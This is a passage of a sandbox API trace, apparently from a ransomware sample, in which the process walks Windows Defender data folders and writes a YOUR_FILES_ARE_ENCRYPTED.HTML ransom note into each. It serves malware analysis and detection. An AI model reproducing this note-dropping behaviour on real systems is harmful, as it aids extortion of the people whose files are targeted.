lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe4eb893d, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe4eb893d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0157.332] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe4eb893d, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe4eb893d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0157.332] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe4eb893d, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe4eb893d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 0 [0157.332] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0157.333] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Backup\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 101 [0157.333] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Backup\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\windows defender\\definition updates\\backup\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x58c [0157.333] WriteFile (in: hFile=0x58c, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebdb14, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebdb14*=0x3c00, lpOverlapped=0x0) returned 1 [0157.336] CloseHandle (hObject=0x58c) returned 1 [0157.336] GetProcessHeap () returned 0x270000 [0157.338] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 [0157.338] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe4eb893d, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe4eb893d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Updates", cAlternateFileName="")) returned 1 [0157.338] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Updates") returned 72 [0157.338] GetProcessHeap () returned 0x270000 [0157.338] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73f0050 [0157.338] lstrcpyW (in: lpString1=0x73f0050, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Updates" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Updates") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Updates" [0157.338] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Updates", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Updates\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Updates\\*" [0157.338] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Updates\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe4eb893d, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe4eb893d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0157.338] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe4eb893d, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe4eb893d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0157.338] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe4eb893d, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe4eb893d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 0 [0157.339] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0157.339] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Updates\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 102 [0157.339] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Updates\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\windows defender\\definition updates\\updates\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x58c [0157.339] WriteFile (in: hFile=0x58c, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebdb14, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebdb14*=0x3c00, lpOverlapped=0x0) returned 1 [0157.342] CloseHandle (hObject=0x58c) returned 1 [0157.342] GetProcessHeap () returned 0x270000 [0157.344] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 [0157.344] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe4eb893d, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe4eb893d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Updates", cAlternateFileName="")) returned 0 [0157.344] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0157.344] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 94 [0157.344] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\windows defender\\definition updates\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a0 [0157.345] WriteFile (in: hFile=0x5a0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0157.347] CloseHandle (hObject=0x5a0) returned 1 [0157.348] GetProcessHeap () returned 0x270000 [0157.349] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75f0050 | out: hHeap=0x270000) returned 1 [0157.349] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4e927dd, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe4e927dd, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe4e927dd, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="LocalCopy", cAlternateFileName="LOCALC~1")) returned 1 [0157.349] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\LocalCopy") returned 55 [0157.349] GetProcessHeap () returned 0x270000 [0157.349] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75f0050 [0157.349] lstrcpyW (in: lpString1=0x75f0050, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\LocalCopy" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\LocalCopy") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\LocalCopy" [0157.350] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\LocalCopy", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\LocalCopy\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\LocalCopy\\*" [0157.350] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\LocalCopy\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4e927dd, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe4e927dd, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe4e927dd, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0157.350] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4e927dd, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe4e927dd, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe4e927dd, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0157.350] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4e927dd, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe4e927dd, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe4e927dd, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 0 [0157.350] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0157.350] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\LocalCopy\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 85 [0157.350] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\LocalCopy\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\windows defender\\localcopy\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a0 [0157.351] WriteFile (in: hFile=0x5a0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0157.353] CloseHandle (hObject=0x5a0) returned 1 [0157.354] GetProcessHeap () returned 0x270000 [0157.355] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75f0050 | out: hHeap=0x270000) returned 1 [0157.355] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4e927dd, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe4e927dd, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe4e927dd, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Quarantine", cAlternateFileName="QUARAN~1")) returned 1 [0157.355] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Quarantine") returned 56 [0157.355] GetProcessHeap () returned 0x270000 [0157.355] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75f0050 [0157.355] lstrcpyW (in: lpString1=0x75f0050, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Quarantine" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Quarantine") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Quarantine" [0157.355] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Quarantine", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Quarantine\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Quarantine\\*" [0157.355] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Quarantine\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4e927dd, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe4e927dd, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe4e927dd, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0157.355] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4e927dd, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe4e927dd, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe4e927dd, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0157.355] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4e927dd, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe4e927dd, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe4e927dd, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 0 [0157.355] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0157.356] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Quarantine\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 86 [0157.356] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Quarantine\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\windows defender\\quarantine\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a0 [0157.356] WriteFile (in: hFile=0x5a0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0157.358] CloseHandle (hObject=0x5a0) returned 1 [0157.359] GetProcessHeap () returned 0x270000 [0157.360] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75f0050 | out: hHeap=0x270000) returned 1 [0157.360] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4e927dd, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0x5ce740bd, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x5ce740bd, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Scans", cAlternateFileName="")) returned 1 [0157.360] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans") returned 51 [0157.360] GetProcessHeap () returned 0x270000 [0157.360] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75f0050 [0157.360] lstrcpyW (in: lpString1=0x75f0050, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans" [0157.360] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\*" [0157.360] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4e927dd, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0x5ce740bd, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x5ce740bd, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0157.361] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4e927dd, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0x5ce740bd, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x5ce740bd, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0157.361] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5ce740bd, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x5cf0c63e, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x5cf0c63e, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="History", cAlternateFileName="")) returned 1 [0157.361] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History") returned 59 [0157.361] GetProcessHeap () returned 0x270000 [0157.361] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73f0050 [0157.361] lstrcpyW (in: lpString1=0x73f0050, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History" [0157.361] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\*" [0157.361] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5ce740bd, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x5cf0c63e, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x5cf0c63e, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0157.361] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5ce740bd, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x5cf0c63e, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x5cf0c63e, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0157.362] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5cf0c63e, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x5cf0c63e, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x5cf0c63e, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="CacheManager", cAlternateFileName="CACHEM~1")) returned 1 [0157.362] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager") returned 72 [0157.362] GetProcessHeap () returned 0x270000 [0157.362] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7400058 [0157.363] lstrcpyW (in: lpString1=0x7400058, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager" [0157.363] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\*" [0157.363] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5cf0c63e, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x5cf0c63e, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x5cf0c63e, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0157.363] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5cf0c63e, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x5cf0c63e, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x5cf0c63e, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0157.364] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5cf0c63e, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x5cf0c63e, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x5cf0c63e, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 0 [0157.364] FindClose (in: hFindFile=0x42f3200 | out: 